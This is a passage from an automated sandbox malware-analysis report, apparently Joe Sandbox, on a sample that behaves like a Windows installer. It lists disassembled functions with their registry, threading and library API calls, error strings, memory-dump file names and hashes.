                                                                                                                                                                      • Part of subcall function 0090F96C: RegCloseKey.ADVAPI32(00000000,?,?,00000001,00000000,00000000,?,?,00904CA5,?,?,00000001), ref: 0090F9BC
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,?,?,00000001,00000000,?,?,?), ref: 00904D0C
                                                                                                                                                                    Strings
                                                                                                                                                                    • Unable to get resume command line from the registry, xrefs: 00904CAB
                                                                                                                                                                    • Failed to get current process path., xrefs: 00904CCA
                                                                                                                                                                    • Failed to re-launch bundle process after RunOnce: %ls, xrefs: 00904CF6
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Close$Handle
                                                                                                                                                                    • String ID: Failed to get current process path.$Failed to re-launch bundle process after RunOnce: %ls$Unable to get resume command line from the registry
                                                                                                                                                                    • API String ID: 187904097-642631345
                                                                                                                                                                    • Opcode ID: 89f16dc9907116d17cafb69af80b043d4ff7180005347f59c95c1b3014604f52
                                                                                                                                                                    • Instruction ID: 76468d5b089edf00d48bc8362e2f0fb560450f52e75806f7bc8c788e7d92f005
                                                                                                                                                                    • Opcode Fuzzy Hash: 89f16dc9907116d17cafb69af80b043d4ff7180005347f59c95c1b3014604f52
                                                                                                                                                                    • Instruction Fuzzy Hash: 19114F71D0151CBFCF22ABA5DC01D9EBBB8AF94711B108196FA10A6291E7319A10DB80
                                                                                                                                                                    Function 009388B2 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00938A56,00000000,00000000,?,00938859,00938A56,00000000,00000000,00000000,?,00938A56,00000006,FlsSetValue), ref: 009388E4
                                                                                                                                                                    • GetLastError.KERNEL32(?,00938859,00938A56,00000000,00000000,00000000,?,00938A56,00000006,FlsSetValue,00962404,0096240C,00000000,00000364,?,00936230), ref: 009388F0
                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00938859,00938A56,00000000,00000000,00000000,?,00938A56,00000006,FlsSetValue,00962404,0096240C,00000000), ref: 009388FE
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3177248105-0
                                                                                                                                                                    • Opcode ID: ddb588e45a65cea8c3292f7eb101984bb308878a514719c875f4233048341162
                                                                                                                                                                    • Instruction ID: 3ee7f5b41eb6ce518216f0b5f9f273962d0777913600b8faffcd288bf96d8c08
                                                                                                                                                                    • Opcode Fuzzy Hash: ddb588e45a65cea8c3292f7eb101984bb308878a514719c875f4233048341162
                                                                                                                                                                    • Instruction Fuzzy Hash: B401F736669326ABCB214A79DC44F6B779CEF06BA1F200A24F916E3140DF60DC008BE0
                                                                                                                                                                    Function 0093615E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00931AEC,00000000,80004004,?,00931DF0,00000000,80004004,00000000,00000000), ref: 00936162
                                                                                                                                                                    • SetLastError.KERNEL32(00000000,80004004,00000000,00000000), ref: 009361CA
                                                                                                                                                                    • SetLastError.KERNEL32(00000000,80004004,00000000,00000000), ref: 009361D6
                                                                                                                                                                    • _abort.LIBCMT ref: 009361DC
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$_abort
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 88804580-0
                                                                                                                                                                    • Opcode ID: 49a657fb469c50b3621fad87d67db14dcaf9a36a69d8e0acc6da9cae135a76ae
                                                                                                                                                                    • Instruction ID: 984fe2d3680124944c6b20ba741c9e5fbf8f0482b7577692a2d601c143a121f6
                                                                                                                                                                    • Opcode Fuzzy Hash: 49a657fb469c50b3621fad87d67db14dcaf9a36a69d8e0acc6da9cae135a76ae
                                                                                                                                                                    • Instruction Fuzzy Hash: 03F0C83920CB01B7C21237B56C0AF2F169E8FC6771F264118F925E6197FF64D8026D61
                                                                                                                                                                    Function 00907435 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00907441
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 009074A8
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to get value of variable: %ls, xrefs: 0090747B
                                                                                                                                                                    • Failed to get value as numeric for variable: %ls, xrefs: 00907497
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                                                    • String ID: Failed to get value as numeric for variable: %ls$Failed to get value of variable: %ls
                                                                                                                                                                    • API String ID: 3168844106-4270472870
                                                                                                                                                                    • Opcode ID: e123cd28f5adeac96d9c2373ca0e102c3d5e7f89797891f424fbeec3c5aa1abd
                                                                                                                                                                    • Instruction ID: dd1925d370d57c1810472961a3ac7efa0d4b79c3399600cfe981dbc557fbf1db
                                                                                                                                                                    • Opcode Fuzzy Hash: e123cd28f5adeac96d9c2373ca0e102c3d5e7f89797891f424fbeec3c5aa1abd
                                                                                                                                                                    • Instruction Fuzzy Hash: 15015E36D49128BFCF115E94CC49E9EBF6AAF44771F018161FD04AA2A1D336AE20A7D1
                                                                                                                                                                    Function 009075AA Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 009075B6
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 0090761D
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to get value as version for variable: %ls, xrefs: 0090760C
                                                                                                                                                                    • Failed to get value of variable: %ls, xrefs: 009075F0
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                                                    • String ID: Failed to get value as version for variable: %ls$Failed to get value of variable: %ls
                                                                                                                                                                    • API String ID: 3168844106-1851729331
                                                                                                                                                                    • Opcode ID: 5623c9284d7666451c06d9bd8a1d1c965b3059200c5d9b403a9f0b15728c4bf3
                                                                                                                                                                    • Instruction ID: 13d7a72767d3e531fd5b7ed96d7fac3b2d6db37f3d1dc8e9c1e28e2889356503
                                                                                                                                                                    • Opcode Fuzzy Hash: 5623c9284d7666451c06d9bd8a1d1c965b3059200c5d9b403a9f0b15728c4bf3
                                                                                                                                                                    • Instruction Fuzzy Hash: 92019E32D0952CEFCF115E84CC09E9EBA28AF14330F008121FD05AA1A1D336AE10ABD5
                                                                                                                                                                    Function 00907539 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 40COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00000000,00000000,00000006,?,00909897,00000000,?,00000000,00000000,00000000,?,009096D6,00000000,?,00000000,00000000), ref: 00907545
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000000,00000000,00000000,00000000,?,00909897,00000000,?,00000000,00000000,00000000,?,009096D6,00000000,?,00000000), ref: 0090759B
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to copy value of variable: %ls, xrefs: 0090758A
                                                                                                                                                                    • Failed to get value of variable: %ls, xrefs: 0090756B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                                                    • String ID: Failed to copy value of variable: %ls$Failed to get value of variable: %ls
                                                                                                                                                                    • API String ID: 3168844106-2936390398
                                                                                                                                                                    • Opcode ID: 1d9e8c126ba60c276512b353030789a8bea1be83b1455a0ec9b39c2069f498e7
                                                                                                                                                                    • Instruction ID: 7b1549001fa383f7e332888ed9c8c947e4f2c4f22cdf4fa1a8dd852348b3a624
                                                                                                                                                                    • Opcode Fuzzy Hash: 1d9e8c126ba60c276512b353030789a8bea1be83b1455a0ec9b39c2069f498e7
                                                                                                                                                                    • Instruction Fuzzy Hash: 34F0817694512CBFCF115F94CC09EDE7B68EF55361F004110FD04A62A0D336AE20ABD0
                                                                                                                                                                    Function 0092E776 Relevance: 6.0, APIs: 4, Instructions: 26timethreadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 0092E788
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0092E797
                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 0092E7A0
                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 0092E7AD
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2933794660-0
                                                                                                                                                                    • Opcode ID: 924073edc5fa7b616a4aa40cd7807395d43263336f26ff40a0c2df2d427f7977
                                                                                                                                                                    • Instruction ID: 43f82c94e59d9132b788ec2fed281f4e8d3737e20241aa66e0f50170f62490b8
                                                                                                                                                                    • Opcode Fuzzy Hash: 924073edc5fa7b616a4aa40cd7807395d43263336f26ff40a0c2df2d427f7977
                                                                                                                                                                    • Instruction Fuzzy Hash: C1F09D74C2520CEBCB00DFB4D949A9EBBF8EF08301F514895A405E7110E734AB049B61
                                                                                                                                                                    Function 00940C5D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 145registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00940DD7
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Close
                                                                                                                                                                    • String ID: regutil.cpp
                                                                                                                                                                    • API String ID: 3535843008-955085611
                                                                                                                                                                    • Opcode ID: f770c7a29e00f21c81c58095607b91c239dbd5aec7d1e25d2dd5c3366da62b3c
                                                                                                                                                                    • Instruction ID: fa554168946b4827568e525d6459a8e845633bfc11640470b9fc75383feab894
                                                                                                                                                                    • Opcode Fuzzy Hash: f770c7a29e00f21c81c58095607b91c239dbd5aec7d1e25d2dd5c3366da62b3c
                                                                                                                                                                    • Instruction Fuzzy Hash: 2441E632D05729EBDF318AD4CC04FAE7A69ABC0721F258264FF44AB190D7789D44ABD0
                                                                                                                                                                    Function 0094479B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 136registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00940F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0096AAA0,00000000,?,009457E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00940F80
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,80000002,SYSTEM\CurrentControlSet\Control\Session Manager,00000003,?,00000000,00000000,00000101), ref: 009448FC
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseOpen
                                                                                                                                                                    • String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                                                                                                                    • API String ID: 47109696-3023217399
                                                                                                                                                                    • Opcode ID: 66ff50b7d8433b321faea30ba56aab74d026389bca79ac3095158d2bea341250
                                                                                                                                                                    • Instruction ID: f8429f3952f10896b03420ca0b55ac03d2f0017e2b271000c6a87d8cdd239f36
                                                                                                                                                                    • Opcode Fuzzy Hash: 66ff50b7d8433b321faea30ba56aab74d026389bca79ac3095158d2bea341250
                                                                                                                                                                    • Instruction Fuzzy Hash: 4E416D75E00259EFCF20DF98C881FAEBBB9EB84B14F2540A9E504A7351EB319E41DB50
                                                                                                                                                                    Function 009410B5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0094112B
                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00941163
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: QueryValue
                                                                                                                                                                    • String ID: regutil.cpp
                                                                                                                                                                    • API String ID: 3660427363-955085611
                                                                                                                                                                    • Opcode ID: f8b962a1879e55bf37fb1827aa61b56c313654d8c01a8fe746415b2466904601
                                                                                                                                                                    • Instruction ID: 5149108fcbfa81cf5f00e272f6f68dfa2315d9c269dcebe310f38aeead99d438
                                                                                                                                                                    • Opcode Fuzzy Hash: f8b962a1879e55bf37fb1827aa61b56c313654d8c01a8fe746415b2466904601
                                                                                                                                                                    • Instruction Fuzzy Hash: 68418032D0412AEFDB219F95CC45EAEBBBDEF48350F10856AEA10A7250D7719E90DB90
                                                                                                                                                                    Function 009366D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0094B518,00000000,00000006,00000001,comres.dll,?,00000000,?,00000000,?,?,00000000,00000006,?,comres.dll,?), ref: 009367A3
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 009367BF
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharErrorLastMultiWide
                                                                                                                                                                    • String ID: comres.dll
                                                                                                                                                                    • API String ID: 203985260-246242247
                                                                                                                                                                    • Opcode ID: 7e3c64d338e5720b46a70eec4df0a87ce31f116922075143dbad06db8353f66a
                                                                                                                                                                    • Instruction ID: e95ec806a79621e8fd46f84478276d57a7b0b50165ecdd8360276c4d3898c1c7
                                                                                                                                                                    • Opcode Fuzzy Hash: 7e3c64d338e5720b46a70eec4df0a87ce31f116922075143dbad06db8353f66a
                                                                                                                                                                    • Instruction Fuzzy Hash: D4310635600311BBCB21AF58C885BAB7BACDF81768F54C069F9169B191EB70CE00CFA1
                                                                                                                                                                    Function 00948F7A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00948E44: lstrlenW.KERNEL32(00000100,?,?,?,00949217,000002C0,00000100,00000100,00000100,?,?,?,00927D87,?,?,000001BC), ref: 00948E69
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,?,?,00000000,?,00000000,?,?,?,00000000,wininet.dll,?,0094B500,wininet.dll,?), ref: 0094907A
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,00000000,?,00000000,?,?,?,00000000,wininet.dll,?,0094B500,wininet.dll,?), ref: 00949087
                                                                                                                                                                      • Part of subcall function 00940F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0096AAA0,00000000,?,009457E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00940F80
                                                                                                                                                                      • Part of subcall function 00940E4F: RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000002,00000100,00000000,00000000,?,?,00928E1B), ref: 00940EAA
                                                                                                                                                                      • Part of subcall function 00940E4F: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00928E1B,00000000), ref: 00940EC8
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Close$EnumInfoOpenQuerylstrlen
                                                                                                                                                                    • String ID: wininet.dll
                                                                                                                                                                    • API String ID: 2680864210-3354682871
                                                                                                                                                                    • Opcode ID: 19c83726104ce9e28e229798a124c17e4dbe32693a94991c4e43766c11cc9dac
                                                                                                                                                                    • Instruction ID: 15213cd7fa0718cf18c110ca333560db9d2c452a3f44c5cf3ec5a567961e37ba
                                                                                                                                                                    • Opcode Fuzzy Hash: 19c83726104ce9e28e229798a124c17e4dbe32693a94991c4e43766c11cc9dac
                                                                                                                                                                    • Instruction Fuzzy Hash: 99310636C0112DABCF21AFA4C980DAFBB79EF44720B5141B9EA15BA121D7318E51EB90
                                                                                                                                                                    Function 0094939E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00948E44: lstrlenW.KERNEL32(00000100,?,?,?,00949217,000002C0,00000100,00000100,00000100,?,?,?,00927D87,?,?,000001BC), ref: 00948E69
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,00000000,?), ref: 00949483
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0094949D
                                                                                                                                                                      • Part of subcall function 00940BE9: RegCreateKeyExW.ADVAPI32(00000001,00000000,00000000,00000000,00000000,00000001,00000000,?,00000000,00000001,?,?,0091061A,?,00000000,00020006), ref: 00940C0E
                                                                                                                                                                      • Part of subcall function 009414F4: RegSetValueExW.ADVAPI32(00020006,00950D10,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,0090F335,00000000,?,00020006), ref: 00941527
                                                                                                                                                                      • Part of subcall function 009414F4: RegDeleteValueW.ADVAPI32(00020006,00950D10,00000000,?,?,0090F335,00000000,?,00020006,?,00950D10,00020006,00000000,?,?,?), ref: 00941557
                                                                                                                                                                      • Part of subcall function 009414A6: RegSetValueExW.ADVAPI32(?,00000005,00000000,00000004,?,00000004,00000001,?,0090F28D,00950D10,Resume,00000005,?,00000000,00000000,00000000), ref: 009414BB
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Value$Close$CreateDeletelstrlen
                                                                                                                                                                    • String ID: %ls\%ls
                                                                                                                                                                    • API String ID: 3924016894-2125769799
                                                                                                                                                                    • Opcode ID: ea65515a93a2c72f533d3835e2fd80c2b127ca69d54b8095c4fe40cdc8d29f84
                                                                                                                                                                    • Instruction ID: cbc55cff05673a90e4f6dcd40676001206040f2ffb56b8fc230590957c018c8d
                                                                                                                                                                    • Opcode Fuzzy Hash: ea65515a93a2c72f533d3835e2fd80c2b127ca69d54b8095c4fe40cdc8d29f84
                                                                                                                                                                    • Instruction Fuzzy Hash: 09310972C0112DBF8F12AFD5CC81D9FBBB9EB44750B5541AAEA0476121D7318E51EB90
                                                                                                                                                                    Function 00903A4D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
